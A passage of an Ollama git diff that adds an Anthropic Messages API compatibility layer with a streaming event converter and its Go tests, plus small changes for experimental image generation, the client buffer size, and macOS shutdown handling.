Data: MessageStartEvent{
Type: "message_start",
Message: MessagesResponse{
ID: c.ID,
Type: "message",
Role: "assistant",
Model: c.Model,
Content: []ContentBlock{},
Usage: Usage{
InputTokens: c.inputTokens,
OutputTokens: 0,
},
},
},
})
}
if r.Message.Thinking != "" && !c.thinkingDone {
if !c.thinkingStarted {
c.thinkingStarted = true
events = append(events, StreamEvent{
Event: "content_block_start",
Data: ContentBlockStartEvent{
Type: "content_block_start",
Index: c.contentIndex,
ContentBlock: ContentBlock{
Type: "thinking",
Thinking: ptr(""),
},
},
})
}
events = append(events, StreamEvent{
Event: "content_block_delta",
Data: ContentBlockDeltaEvent{
Type: "content_block_delta",
Index: c.contentIndex,
Delta: Delta{
Type: "thinking_delta",
Thinking: r.Message.Thinking,
},
},
})
}
if r.Message.Content != "" {
if c.thinkingStarted && !c.thinkingDone {
c.thinkingDone = true
events = append(events, StreamEvent{
Event: "content_block_stop",
Data: ContentBlockStopEvent{
Type: "content_block_stop",
Index: c.contentIndex,
},
})
c.contentIndex++
}
if !c.textStarted {
c.textStarted = true
events = append(events, StreamEvent{
Event: "content_block_start",
Data: ContentBlockStartEvent{
Type: "content_block_start",
Index: c.contentIndex,
ContentBlock: ContentBlock{
Type: "text",
Text: ptr(""),
},
},
})
}
events = append(events, StreamEvent{
Event: "content_block_delta",
Data: ContentBlockDeltaEvent{
Type: "content_block_delta",
Index: c.contentIndex,
Delta: Delta{
Type: "text_delta",
Text: r.Message.Content,
},
},
})
}
for _, tc := range r.Message.ToolCalls {
if c.toolCallsSent[tc.ID] {
continue
}
if c.textStarted {
events = append(events, StreamEvent{
Event: "content_block_stop",
Data: ContentBlockStopEvent{
Type: "content_block_stop",
Index: c.contentIndex,
},
})
c.contentIndex++
c.textStarted = false
}
argsJSON, err := json.Marshal(tc.Function.Arguments)
if err != nil {
slog.Error("failed to marshal tool arguments", "error", err, "tool_id", tc.ID)
continue
}
events = append(events, StreamEvent{
Event: "content_block_start",
Data: ContentBlockStartEvent{
Type: "content_block_start",
Index: c.contentIndex,
ContentBlock: ContentBlock{
Type: "tool_use",
ID: tc.ID,
Name: tc.Function.Name,
Input: map[string]any{},
},
},
})
events = append(events, StreamEvent{
Event: "content_block_delta",
Data: ContentBlockDeltaEvent{
Type: "content_block_delta",
Index: c.contentIndex,
Delta: Delta{
Type: "input_json_delta",
PartialJSON: string(argsJSON),
},
},
})
events = append(events, StreamEvent{
Event: "content_block_stop",
Data: ContentBlockStopEvent{
Type: "content_block_stop",
Index: c.contentIndex,
},
})
c.toolCallsSent[tc.ID] = true
c.contentIndex++
}
if r.Done {
if c.textStarted {
events = append(events, StreamEvent{
Event: "content_block_stop",
Data: ContentBlockStopEvent{
Type: "content_block_stop",
Index: c.contentIndex,
},
})
} else if c.thinkingStarted && !c.thinkingDone {
events = append(events, StreamEvent{
Event: "content_block_stop",
Data: ContentBlockStopEvent{
Type: "content_block_stop",
Index: c.contentIndex,
},
})
}
c.outputTokens = r.Metrics.EvalCount
stopReason := mapStopReason(r.DoneReason, len(c.toolCallsSent) > 0)
events = append(events, StreamEvent{
Event: "message_delta",
Data: MessageDeltaEvent{
Type: "message_delta",
Delta: MessageDelta{
StopReason: stopReason,
},
Usage: DeltaUsage{
OutputTokens: c.outputTokens,
},
},
})
events = append(events, StreamEvent{
Event: "message_stop",
Data: MessageStopEvent{
Type: "message_stop",
},
})
}
return events
}
// generateID generates a unique ID with the given prefix using crypto/rand
func generateID(prefix string) string {
b := make([]byte, 12)
if _, err := rand.Read(b); err != nil {
// Fallback to time-based ID if crypto/rand fails
return fmt.Sprintf("%s_%d", prefix, time.Now().UnixNano())
}
return fmt.Sprintf("%s_%x", prefix, b)
}
// GenerateMessageID generates a unique message ID
func GenerateMessageID() string {
return generateID("msg")
}
// ptr returns a pointer to the given string value
func ptr(s string) *string {
return &s
}
// mapToArgs converts a map to ToolCallFunctionArguments
func mapToArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}

953
anthropic/anthropic_test.go Normal file
View File

@@ -0,0 +1,953 @@
package anthropic
import (
"encoding/base64"
"encoding/json"
"testing"
"github.com/google/go-cmp/cmp"
"github.com/ollama/ollama/api"
)
const (
testImage = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
)
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
func TestFromMessagesRequest_Basic(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{Role: "user", Content: "Hello"},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got %q", result.Model)
}
if len(result.Messages) != 1 {
t.Fatalf("expected 1 message, got %d", len(result.Messages))
}
if result.Messages[0].Role != "user" || result.Messages[0].Content != "Hello" {
t.Errorf("unexpected message: %+v", result.Messages[0])
}
if numPredict, ok := result.Options["num_predict"].(int); !ok || numPredict != 1024 {
t.Errorf("expected num_predict 1024, got %v", result.Options["num_predict"])
}
}
func TestFromMessagesRequest_WithSystemPrompt(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
System: "You are a helpful assistant.",
Messages: []MessageParam{
{Role: "user", Content: "Hello"},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 2 {
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
}
if result.Messages[0].Role != "system" || result.Messages[0].Content != "You are a helpful assistant." {
t.Errorf("unexpected system message: %+v", result.Messages[0])
}
}
func TestFromMessagesRequest_WithSystemPromptArray(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
System: []any{
map[string]any{"type": "text", "text": "You are helpful."},
map[string]any{"type": "text", "text": " Be concise."},
},
Messages: []MessageParam{
{Role: "user", Content: "Hello"},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 2 {
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
}
if result.Messages[0].Content != "You are helpful. Be concise." {
t.Errorf("unexpected system message content: %q", result.Messages[0].Content)
}
}
func TestFromMessagesRequest_WithOptions(t *testing.T) {
temp := 0.7
topP := 0.9
topK := 40
req := MessagesRequest{
Model: "test-model",
MaxTokens: 2048,
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
Temperature: &temp,
TopP: &topP,
TopK: &topK,
StopSequences: []string{"\n", "END"},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Options["temperature"] != 0.7 {
t.Errorf("expected temperature 0.7, got %v", result.Options["temperature"])
}
if result.Options["top_p"] != 0.9 {
t.Errorf("expected top_p 0.9, got %v", result.Options["top_p"])
}
if result.Options["top_k"] != 40 {
t.Errorf("expected top_k 40, got %v", result.Options["top_k"])
}
if diff := cmp.Diff([]string{"\n", "END"}, result.Options["stop"]); diff != "" {
t.Errorf("stop sequences mismatch: %s", diff)
}
}
func TestFromMessagesRequest_WithImage(t *testing.T) {
imgData, _ := base64.StdEncoding.DecodeString(testImage)
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{
Role: "user",
Content: []any{
map[string]any{"type": "text", "text": "What's in this image?"},
map[string]any{
"type": "image",
"source": map[string]any{
"type": "base64",
"media_type": "image/png",
"data": testImage,
},
},
},
},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 1 {
t.Fatalf("expected 1 message, got %d", len(result.Messages))
}
if result.Messages[0].Content != "What's in this image?" {
t.Errorf("expected content 'What's in this image?', got %q", result.Messages[0].Content)
}
if len(result.Messages[0].Images) != 1 {
t.Fatalf("expected 1 image, got %d", len(result.Messages[0].Images))
}
if string(result.Messages[0].Images[0]) != string(imgData) {
t.Error("image data mismatch")
}
}
func TestFromMessagesRequest_WithToolUse(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{Role: "user", Content: "What's the weather in Paris?"},
{
Role: "assistant",
Content: []any{
map[string]any{
"type": "tool_use",
"id": "call_123",
"name": "get_weather",
"input": map[string]any{"location": "Paris"},
},
},
},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 2 {
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
}
if len(result.Messages[1].ToolCalls) != 1 {
t.Fatalf("expected 1 tool call, got %d", len(result.Messages[1].ToolCalls))
}
tc := result.Messages[1].ToolCalls[0]
if tc.ID != "call_123" {
t.Errorf("expected tool call ID 'call_123', got %q", tc.ID)
}
if tc.Function.Name != "get_weather" {
t.Errorf("expected tool name 'get_weather', got %q", tc.Function.Name)
}
}
func TestFromMessagesRequest_WithToolResult(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{
Role: "user",
Content: []any{
map[string]any{
"type": "tool_result",
"tool_use_id": "call_123",
"content": "The weather in Paris is sunny, 22°C",
},
},
},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 1 {
t.Fatalf("expected 1 message, got %d", len(result.Messages))
}
msg := result.Messages[0]
if msg.Role != "tool" {
t.Errorf("expected role 'tool', got %q", msg.Role)
}
if msg.ToolCallID != "call_123" {
t.Errorf("expected tool_call_id 'call_123', got %q", msg.ToolCallID)
}
if msg.Content != "The weather in Paris is sunny, 22°C" {
t.Errorf("unexpected content: %q", msg.Content)
}
}
func TestFromMessagesRequest_WithTools(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
Tools: []Tool{
{
Name: "get_weather",
Description: "Get current weather",
InputSchema: json.RawMessage(`{"type":"object","properties":{"location":{"type":"string"}},"required":["location"]}`),
},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Tools) != 1 {
t.Fatalf("expected 1 tool, got %d", len(result.Tools))
}
tool := result.Tools[0]
if tool.Type != "function" {
t.Errorf("expected type 'function', got %q", tool.Type)
}
if tool.Function.Name != "get_weather" {
t.Errorf("expected name 'get_weather', got %q", tool.Function.Name)
}
if tool.Function.Description != "Get current weather" {
t.Errorf("expected description 'Get current weather', got %q", tool.Function.Description)
}
}
func TestFromMessagesRequest_WithThinking(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
Thinking: &ThinkingConfig{Type: "enabled", BudgetTokens: 1000},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Think == nil {
t.Fatal("expected Think to be set")
}
if v, ok := result.Think.Value.(bool); !ok || !v {
t.Errorf("expected Think.Value to be true, got %v", result.Think.Value)
}
}
// TestFromMessagesRequest_ThinkingOnlyBlock verifies that messages containing only
// a thinking block (no text, images, or tool calls) are preserved and not dropped.
func TestFromMessagesRequest_ThinkingOnlyBlock(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{Role: "user", Content: "Hello"},
{
Role: "assistant",
Content: []any{
map[string]any{
"type": "thinking",
"thinking": "Let me think about this...",
},
},
},
},
}
result, err := FromMessagesRequest(req)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Messages) != 2 {
t.Fatalf("expected 2 messages, got %d", len(result.Messages))
}
assistantMsg := result.Messages[1]
if assistantMsg.Thinking != "Let me think about this..." {
t.Errorf("expected thinking content, got %q", assistantMsg.Thinking)
}
}
func TestFromMessagesRequest_ToolUseMissingID(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{
Role: "assistant",
Content: []any{
map[string]any{
"type": "tool_use",
"name": "get_weather",
},
},
},
},
}
_, err := FromMessagesRequest(req)
if err == nil {
t.Fatal("expected error for missing tool_use id")
}
if err.Error() != "tool_use block missing required 'id' field" {
t.Errorf("unexpected error message: %v", err)
}
}
func TestFromMessagesRequest_ToolUseMissingName(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{
{
Role: "assistant",
Content: []any{
map[string]any{
"type": "tool_use",
"id": "call_123",
},
},
},
},
}
_, err := FromMessagesRequest(req)
if err == nil {
t.Fatal("expected error for missing tool_use name")
}
if err.Error() != "tool_use block missing required 'name' field" {
t.Errorf("unexpected error message: %v", err)
}
}
func TestFromMessagesRequest_InvalidToolSchema(t *testing.T) {
req := MessagesRequest{
Model: "test-model",
MaxTokens: 1024,
Messages: []MessageParam{{Role: "user", Content: "Hello"}},
Tools: []Tool{
{
Name: "bad_tool",
InputSchema: json.RawMessage(`{invalid json`),
},
},
}
_, err := FromMessagesRequest(req)
if err == nil {
t.Fatal("expected error for invalid tool schema")
}
}
func TestToMessagesResponse_Basic(t *testing.T) {
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
Content: "Hello there!",
},
Done: true,
DoneReason: "stop",
Metrics: api.Metrics{
PromptEvalCount: 10,
EvalCount: 5,
},
}
result := ToMessagesResponse("msg_123", resp)
if result.ID != "msg_123" {
t.Errorf("expected ID 'msg_123', got %q", result.ID)
}
if result.Type != "message" {
t.Errorf("expected type 'message', got %q", result.Type)
}
if result.Role != "assistant" {
t.Errorf("expected role 'assistant', got %q", result.Role)
}
if len(result.Content) != 1 {
t.Fatalf("expected 1 content block, got %d", len(result.Content))
}
if result.Content[0].Type != "text" || result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
t.Errorf("unexpected content: %+v", result.Content[0])
}
if result.StopReason != "end_turn" {
t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
}
if result.Usage.InputTokens != 10 || result.Usage.OutputTokens != 5 {
t.Errorf("unexpected usage: %+v", result.Usage)
}
}
func TestToMessagesResponse_WithToolCalls(t *testing.T) {
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
ID: "call_123",
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "Paris"}),
},
},
},
},
Done: true,
DoneReason: "stop",
}
result := ToMessagesResponse("msg_123", resp)
if len(result.Content) != 1 {
t.Fatalf("expected 1 content block, got %d", len(result.Content))
}
if result.Content[0].Type != "tool_use" {
t.Errorf("expected type 'tool_use', got %q", result.Content[0].Type)
}
if result.Content[0].ID != "call_123" {
t.Errorf("expected ID 'call_123', got %q", result.Content[0].ID)
}
if result.Content[0].Name != "get_weather" {
t.Errorf("expected name 'get_weather', got %q", result.Content[0].Name)
}
if result.StopReason != "tool_use" {
t.Errorf("expected stop_reason 'tool_use', got %q", result.StopReason)
}
}
func TestToMessagesResponse_WithThinking(t *testing.T) {
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
Content: "The answer is 42.",
Thinking: "Let me think about this...",
},
Done: true,
DoneReason: "stop",
}
result := ToMessagesResponse("msg_123", resp)
if len(result.Content) != 2 {
t.Fatalf("expected 2 content blocks, got %d", len(result.Content))
}
if result.Content[0].Type != "thinking" {
t.Errorf("expected first block type 'thinking', got %q", result.Content[0].Type)
}
if result.Content[0].Thinking == nil || *result.Content[0].Thinking != "Let me think about this..." {
t.Errorf("unexpected thinking content: %v", result.Content[0].Thinking)
}
if result.Content[1].Type != "text" {
t.Errorf("expected second block type 'text', got %q", result.Content[1].Type)
}
}
func TestMapStopReason(t *testing.T) {
tests := []struct {
reason string
hasToolCalls bool
want string
}{
{"stop", false, "end_turn"},
{"length", false, "max_tokens"},
{"stop", true, "tool_use"},
{"other", false, "stop_sequence"},
{"", false, ""},
}
for _, tt := range tests {
got := mapStopReason(tt.reason, tt.hasToolCalls)
if got != tt.want {
t.Errorf("mapStopReason(%q, %v) = %q, want %q", tt.reason, tt.hasToolCalls, got, tt.want)
}
}
}
func TestNewError(t *testing.T) {
tests := []struct {
code int
want string
}{
{400, "invalid_request_error"},
{401, "authentication_error"},
{403, "permission_error"},
{404, "not_found_error"},
{429, "rate_limit_error"},
{500, "api_error"},
{503, "overloaded_error"},
{529, "overloaded_error"},
}
for _, tt := range tests {
result := NewError(tt.code, "test message")
if result.Type != "error" {
t.Errorf("NewError(%d) type = %q, want 'error'", tt.code, result.Type)
}
if result.Error.Type != tt.want {
t.Errorf("NewError(%d) error.type = %q, want %q", tt.code, result.Error.Type, tt.want)
}
if result.Error.Message != "test message" {
t.Errorf("NewError(%d) message = %q, want 'test message'", tt.code, result.Error.Message)
}
if result.RequestID == "" {
t.Errorf("NewError(%d) request_id should not be empty", tt.code)
}
}
}
func TestGenerateMessageID(t *testing.T) {
id1 := GenerateMessageID()
id2 := GenerateMessageID()
if id1 == "" {
t.Error("GenerateMessageID returned empty string")
}
if id1 == id2 {
t.Error("GenerateMessageID returned duplicate IDs")
}
if len(id1) < 10 {
t.Errorf("GenerateMessageID returned short ID: %q", id1)
}
if id1[:4] != "msg_" {
t.Errorf("GenerateMessageID should start with 'msg_', got %q", id1[:4])
}
}
func TestStreamConverter_Basic(t *testing.T) {
conv := NewStreamConverter("msg_123", "test-model")
// First chunk
resp1 := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
Content: "Hello",
},
Metrics: api.Metrics{PromptEvalCount: 10},
}
events1 := conv.Process(resp1)
if len(events1) < 3 {
t.Fatalf("expected at least 3 events for first chunk, got %d", len(events1))
}
// Should have message_start, content_block_start, content_block_delta
if events1[0].Event != "message_start" {
t.Errorf("expected first event 'message_start', got %q", events1[0].Event)
}
if events1[1].Event != "content_block_start" {
t.Errorf("expected second event 'content_block_start', got %q", events1[1].Event)
}
if events1[2].Event != "content_block_delta" {
t.Errorf("expected third event 'content_block_delta', got %q", events1[2].Event)
}
// Final chunk
resp2 := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
Content: " world!",
},
Done: true,
DoneReason: "stop",
Metrics: api.Metrics{EvalCount: 5},
}
events2 := conv.Process(resp2)
// Should have content_block_delta, content_block_stop, message_delta, message_stop
hasStop := false
for _, e := range events2 {
if e.Event == "message_stop" {
hasStop = true
}
}
if !hasStop {
t.Error("expected message_stop event in final chunk")
}
}
func TestStreamConverter_WithToolCalls(t *testing.T) {
conv := NewStreamConverter("msg_123", "test-model")
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
ID: "call_123",
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "Paris"}),
},
},
},
},
Done: true,
DoneReason: "stop",
Metrics: api.Metrics{PromptEvalCount: 10, EvalCount: 5},
}
events := conv.Process(resp)
hasToolStart := false
hasToolDelta := false
for _, e := range events {
if e.Event == "content_block_start" {
if start, ok := e.Data.(ContentBlockStartEvent); ok {
if start.ContentBlock.Type == "tool_use" {
hasToolStart = true
}
}
}
if e.Event == "content_block_delta" {
if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
if delta.Delta.Type == "input_json_delta" {
hasToolDelta = true
}
}
}
}
if !hasToolStart {
t.Error("expected tool_use content_block_start event")
}
if !hasToolDelta {
t.Error("expected input_json_delta event")
}
}
func TestStreamConverter_ToolCallWithUnmarshalableArgs(t *testing.T) {
// Test that unmarshalable arguments (like channels) are handled gracefully
// and don't cause a panic or corrupt stream
conv := NewStreamConverter("msg_123", "test-model")
// Create a channel which cannot be JSON marshaled
unmarshalable := make(chan int)
badArgs := api.NewToolCallFunctionArguments()
badArgs.Set("channel", unmarshalable)
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
ID: "call_bad",
Function: api.ToolCallFunction{
Name: "bad_function",
Arguments: badArgs,
},
},
},
},
Done: true,
DoneReason: "stop",
}
// Should not panic and should skip the unmarshalable tool call
events := conv.Process(resp)
// Verify no tool_use block was started (since marshal failed before block start)
hasToolStart := false
for _, e := range events {
if e.Event == "content_block_start" {
if start, ok := e.Data.(ContentBlockStartEvent); ok {
if start.ContentBlock.Type == "tool_use" {
hasToolStart = true
}
}
}
}
if hasToolStart {
t.Error("expected no tool_use block when arguments cannot be marshaled")
}
}
func TestStreamConverter_MultipleToolCallsWithMixedValidity(t *testing.T) {
// Test that valid tool calls still work when mixed with invalid ones
conv := NewStreamConverter("msg_123", "test-model")
unmarshalable := make(chan int)
badArgs := api.NewToolCallFunctionArguments()
badArgs.Set("channel", unmarshalable)
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
ID: "call_good",
Function: api.ToolCallFunction{
Name: "good_function",
Arguments: testArgs(map[string]any{"location": "Paris"}),
},
},
{
ID: "call_bad",
Function: api.ToolCallFunction{
Name: "bad_function",
Arguments: badArgs,
},
},
},
},
Done: true,
DoneReason: "stop",
}
events := conv.Process(resp)
// Count tool_use blocks - should only have 1 (the valid one)
toolStartCount := 0
toolDeltaCount := 0
for _, e := range events {
if e.Event == "content_block_start" {
if start, ok := e.Data.(ContentBlockStartEvent); ok {
if start.ContentBlock.Type == "tool_use" {
toolStartCount++
if start.ContentBlock.Name != "good_function" {
t.Errorf("expected tool name 'good_function', got %q", start.ContentBlock.Name)
}
}
}
}
if e.Event == "content_block_delta" {
if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
if delta.Delta.Type == "input_json_delta" {
toolDeltaCount++
}
}
}
}
if toolStartCount != 1 {
t.Errorf("expected 1 tool_use block, got %d", toolStartCount)
}
if toolDeltaCount != 1 {
t.Errorf("expected 1 input_json_delta, got %d", toolDeltaCount)
}
}
// TestContentBlockJSON_EmptyFieldsPresent verifies that empty text and thinking fields
// are serialized in JSON output. The Anthropic SDK requires these fields to be present
// (even when empty) in content_block_start events to properly accumulate streaming deltas.
// Without these fields, the SDK throws: "TypeError: unsupported operand type(s) for +=: 'NoneType' and 'str'"
func TestContentBlockJSON_EmptyFieldsPresent(t *testing.T) {
tests := []struct {
name string
block ContentBlock
wantKeys []string
}{
{
name: "text block includes empty text field",
block: ContentBlock{
Type: "text",
Text: ptr(""),
},
wantKeys: []string{"type", "text"},
},
{
name: "thinking block includes empty thinking field",
block: ContentBlock{
Type: "thinking",
Thinking: ptr(""),
},
wantKeys: []string{"type", "thinking"},
},
{
name: "text block with content",
block: ContentBlock{
Type: "text",
Text: ptr("hello"),
},
wantKeys: []string{"type", "text"},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
data, err := json.Marshal(tt.block)
if err != nil {
t.Fatalf("failed to marshal: %v", err)
}
var result map[string]any
if err := json.Unmarshal(data, &result); err != nil {
t.Fatalf("failed to unmarshal: %v", err)
}
for _, key := range tt.wantKeys {
if _, ok := result[key]; !ok {
t.Errorf("expected key %q to be present in JSON output, got: %s", key, string(data))
}
}
})
}
}
// TestStreamConverter_ContentBlockStartIncludesEmptyFields verifies that content_block_start
// events include the required empty fields for SDK compatibility.
func TestStreamConverter_ContentBlockStartIncludesEmptyFields(t *testing.T) {
t.Run("text block start includes empty text", func(t *testing.T) {
conv := NewStreamConverter("msg_123", "test-model")
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{Role: "assistant", Content: "hello"},
}
events := conv.Process(resp)
var foundTextStart bool
for _, e := range events {
if e.Event == "content_block_start" {
if start, ok := e.Data.(ContentBlockStartEvent); ok {
if start.ContentBlock.Type == "text" {
foundTextStart = true
// Marshal and verify the text field is present
data, _ := json.Marshal(start)
var result map[string]any
json.Unmarshal(data, &result)
cb := result["content_block"].(map[string]any)
if _, ok := cb["text"]; !ok {
t.Error("content_block_start for text should include 'text' field")
}
}
}
}
}
if !foundTextStart {
t.Error("expected text content_block_start event")
}
})
t.Run("thinking block start includes empty thinking", func(t *testing.T) {
conv := NewStreamConverter("msg_123", "test-model")
resp := api.ChatResponse{
Model: "test-model",
Message: api.Message{Role: "assistant", Thinking: "let me think..."},
}
events := conv.Process(resp)
var foundThinkingStart bool
for _, e := range events {
if e.Event == "content_block_start" {
if start, ok := e.Data.(ContentBlockStartEvent); ok {
if start.ContentBlock.Type == "thinking" {
foundThinkingStart = true
data, _ := json.Marshal(start)
var result map[string]any
json.Unmarshal(data, &result)
cb := result["content_block"].(map[string]any)
if _, ok := cb["thinking"]; !ok {
t.Error("content_block_start for thinking should include 'thinking' field")
}
}
}
}
}
if !foundThinkingStart {
t.Error("expected thinking content_block_start event")
}
})
}

View File

@@ -165,7 +165,7 @@ func (c *Client) do(ctx context.Context, method, path string, reqData, respData
return nil
}
const maxBufferSize = 512 * format.KiloByte
const maxBufferSize = 8 * format.MegaByte
func (c *Client) stream(ctx context.Context, method, path string, data any, fn func([]byte) error) error {
var buf io.Reader
@@ -281,6 +281,20 @@ func (c *Client) Generate(ctx context.Context, req *GenerateRequest, fn Generate
})
}
// XGenerate generates images using the experimental /x/generate endpoint.
// This endpoint is specifically designed for image generation models and
// supports parameters like width, height, and steps.
func (c *Client) XGenerate(ctx context.Context, req *GenerateRequest, fn GenerateResponseFunc) error {
return c.stream(ctx, http.MethodPost, "/x/generate", req, func(bts []byte) error {
var resp GenerateResponse
if err := json.Unmarshal(bts, &resp); err != nil {
return err
}
return fn(resp)
})
}
// ChatResponseFunc is a function that [Client.Chat] invokes every time
// a response is received from the service. If this function returns an error,
// [Client.Chat] will stop generating and return this error.

View File

@@ -97,6 +97,15 @@ type GenerateRequest struct {
// request, for multimodal models.
Images []ImageData `json:"images,omitempty"`
// Width is the width of the generated image (for image generation models).
Width int32 `json:"width,omitempty"`
// Height is the height of the generated image (for image generation models).
Height int32 `json:"height,omitempty"`
// Steps is the number of diffusion steps (for image generation models).
Steps int32 `json:"steps,omitempty"`
// Options lists model-specific options. For example, temperature can be
// set through this field, if the model supports it.
Options map[string]any `json:"options"`
@@ -860,6 +869,18 @@ type GenerateResponse struct {
// Logprobs contains log probability information for the generated tokens,
// if requested via the Logprobs parameter.
Logprobs []Logprob `json:"logprobs,omitempty"`
// Status describes the current phase of generation (e.g., "generating image").
Status string `json:"status,omitempty"`
// Total is the total count for the current phase (e.g., total steps).
Total int64 `json:"total,omitempty"`
// Completed is the completed count for the current phase.
Completed int64 `json:"completed,omitempty"`
// Images contains base64-encoded generated images for image generation models.
Images []string `json:"images,omitempty"`
}
// ModelDetails provides details about a model.

View File

@@ -14,6 +14,7 @@ extern NSString *SystemWidePath;
@interface AppDelegate () <NSWindowDelegate, WKNavigationDelegate, WKUIDelegate>
@property(strong, nonatomic) NSStatusItem *statusItem;
@property(assign, nonatomic) BOOL updateAvailable;
@property(assign, nonatomic) BOOL systemShutdownInProgress;
@end
@implementation AppDelegate
@@ -40,6 +41,13 @@ bool firstTimeRun,startHidden; // Set in run before initialization
}
- (void)applicationDidFinishLaunching:(NSNotification *)aNotification {
// Register for system shutdown/restart notification so we can allow termination
[[[NSWorkspace sharedWorkspace] notificationCenter]
addObserver:self
selector:@selector(systemWillPowerOff:)
name:NSWorkspaceWillPowerOffNotification
object:nil];
// if we're in development mode, set the app icon
NSString *bundlePath = [[NSBundle mainBundle] bundlePath];
if (![bundlePath hasSuffix:@".app"]) {
@@ -278,7 +286,18 @@ bool firstTimeRun,startHidden; // Set in run before initialization
[NSApp activateIgnoringOtherApps:YES];
}
- (void)systemWillPowerOff:(NSNotification *)notification {
// Set flag so applicationShouldTerminate: knows to allow termination.
// The system will call applicationShouldTerminate: after posting this notification.
self.systemShutdownInProgress = YES;
}
- (NSApplicationTerminateReply)applicationShouldTerminate:(NSApplication *)sender {
// Allow termination if the system is shutting down or restarting
if (self.systemShutdownInProgress) {
return NSTerminateNow;
}
// Otherwise just hide the app (for Cmd+Q, close button, etc.)
[NSApp hide:nil];
[NSApp setActivationPolicy:NSApplicationActivationPolicyAccessory];
return NSTerminateCancel;

View File

@@ -46,6 +46,9 @@ import (
"github.com/ollama/ollama/types/syncmap"
"github.com/ollama/ollama/version"
xcmd "github.com/ollama/ollama/x/cmd"
"github.com/ollama/ollama/x/create"
xcreateclient "github.com/ollama/ollama/x/create/client"
"github.com/ollama/ollama/x/imagegen"
)
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
@@ -91,11 +94,88 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
p := progress.NewProgress(os.Stderr)
defer p.Stop()
// Validate model name early to fail fast
modelName := args[0]
name := model.ParseName(modelName)
if !name.IsValid() {
return fmt.Errorf("invalid model name: %s", modelName)
}
// Check for --experimental flag for safetensors model creation
experimental, _ := cmd.Flags().GetBool("experimental")
if experimental {
// Get Modelfile content - either from -f flag or default to "FROM ."
var reader io.Reader
filename, err := getModelfileName(cmd)
if os.IsNotExist(err) || filename == "" {
// No Modelfile specified or found - use default
reader = strings.NewReader("FROM .\n")
} else if err != nil {
return err
} else {
f, err := os.Open(filename)
if err != nil {
return err
}
defer f.Close()
reader = f
}
// Parse the Modelfile
modelfile, err := parser.ParseFile(reader)
if err != nil {
return fmt.Errorf("failed to parse Modelfile: %w", err)
}
// Extract FROM path and configuration
var modelDir string
mfConfig := &xcreateclient.ModelfileConfig{}
for _, cmd := range modelfile.Commands {
switch cmd.Name {
case "model":
